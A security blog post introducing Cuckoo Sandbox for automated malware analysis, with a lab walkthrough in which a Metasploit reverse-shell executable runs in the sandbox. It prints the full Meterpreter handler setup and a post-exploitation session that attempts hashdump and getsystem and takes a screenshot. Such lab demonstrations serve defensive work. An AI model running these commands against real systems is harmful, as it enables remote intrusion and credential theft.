May 18, 2018
Malware Analysis is for the (Cuckoo) Birds
Written by
Scott Nusbaum


What is Cuckoo Sandbox?
According to their website, Cuckoo Sandbox is “the leading open source automated malware analysis system”. [caption id="attachment_14224" align="aligncenter" width="974"]
Basic workings of Cuckoo
[caption id="attachment_14225" align="aligncenter" width="974"]


- ESX / ESXI
- KVM
- QEMU
- VirtualBox
- VMware
- vSphere
- XenServer
- Proxmox -- I modified this to make it work, see the Making Cuckoo working on Proxmox blog post.


Why Should I use it?
Some of the reasons to have the sandbox internal to your organization is because it would provide quick and definitive feedback on questionable files and URLs. For instance, an employee receives a phishing email with an attached document. Submit the document to Cuckoo and it will open the document and record everything about the system during this time. If the document attempts to create a new process, dump a file, edit the registry, or download more malware; all subsequent actions will be recorded. However, if it is just a normal document there will be no need to spend the time and money to either investigate internally or send the document to have it analyzed. The VM image can also be controlled. Most organizations build PCs based on a template. This template can be converted to a VM drive and used as the basis for the Cuckoo analysis. This would provide accurate results of how a piece of malware would act in YOUR environment. The host system does not need to be an enterprise server with massive amounts of RAM and disk space. If the system is capable of running a single VM it can run Cuckoo. The more powerful the host system the faster the VM can be spun up and taken down but that extra PC in the corner that nobody is using is perfect for running a malware sample now and again.Malware Walk-Through Without Network Connectivity
To illustrate the usage of the Cuckoo sandbox, let us explore a simple malware. We will generate an executable using Metasploit to create a reverse shell. [caption id="attachment_14230" align="aligncenter" width="974"]




Malware Walk-Through with Network Connectivity
WARNING:
There are multiple reasons NOT to test with live network connectivity. One of the biggest is it gives the attackers information about where it is being run. For instance, if the malware is a targeted attack on a certain company or even division in the company, and the C&C connection is established from elsewhere, the attackers now know they have been caught. This normally means they will change their approach or malware. Other indicators include User-agents, Malformed C&C packets, and sandbox hostnames. Using the same steps as above, but this time we enabled network connectivity. We created a malware sample that will attempt to connect to 192.168.56.22, which is a Kali Linux VM with a Meterpreter session listening. The submitted EXE is the same as previous, but this time we interact with the session through the Meterpreter. The following commands were issued.- ls
- sysinfo
- hashdump
- getsystem
- screenshot
- quit
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.56.22
lhost => 192.168.56.22
msf exploit(multi/handler) > set lport 8080
lport => 8080
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.22:8080
[*] Sending stage (179779 bytes) to 192.168.56.99
[*] Meterpreter session 2 opened (192.168.56.22:8080 -> 192.168.56.99:49159) at 2018-03-29 15:02:39 -0400
meterpreter > ls
Listing: C:\Users\mikesmith\AppData\Local\Temp
==============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 73802 fil 2018-03-29 19:00:54 -0400 1.exe
100666/rw-rw-rw- 0 fil 2018-03-27 09:44:20 -0400 FXSAPIDebugLogFile.txt
100666/rw-rw-rw- 0 fil 2018-03-28 19:31:47 -0400 Kno2B1.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:42:54 -0400 Kno2FD6.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:48:36 -0400 Kno6A27.tmp
100666/rw-rw-rw- 0 fil 2018-03-28 19:48:05 -0400 KnoF0B4.tmp
40777/rwxrwxrwx 0 dir 2018-03-28 19:43:55 -0400 Low
100666/rw-rw-rw- 898 fil 2018-03-28 19:31:53 -0400 StructuredQuery.log
40777/rwxrwxrwx 0 dir 2018-03-29 19:00:26 -0400 WPDNSE
100666/rw-rw-rw- 49208 fil 2018-03-28 20:14:28 -0400 mikesmith.bmp
100666/rw-rw-rw- 1869 fil 2018-03-27 19:22:55 -0400 wmsetup.log
meterpreter > sysinfo
Computer : MS_PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > screenshot
Screenshot saved to: /root/emDBSQxC.jpeg
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.56.99 - Meterpreter session 2 closed. Reason: User exit
msf exploit(multi/handler) >
[caption id="attachment_14235" align="aligncenter" width="974"]






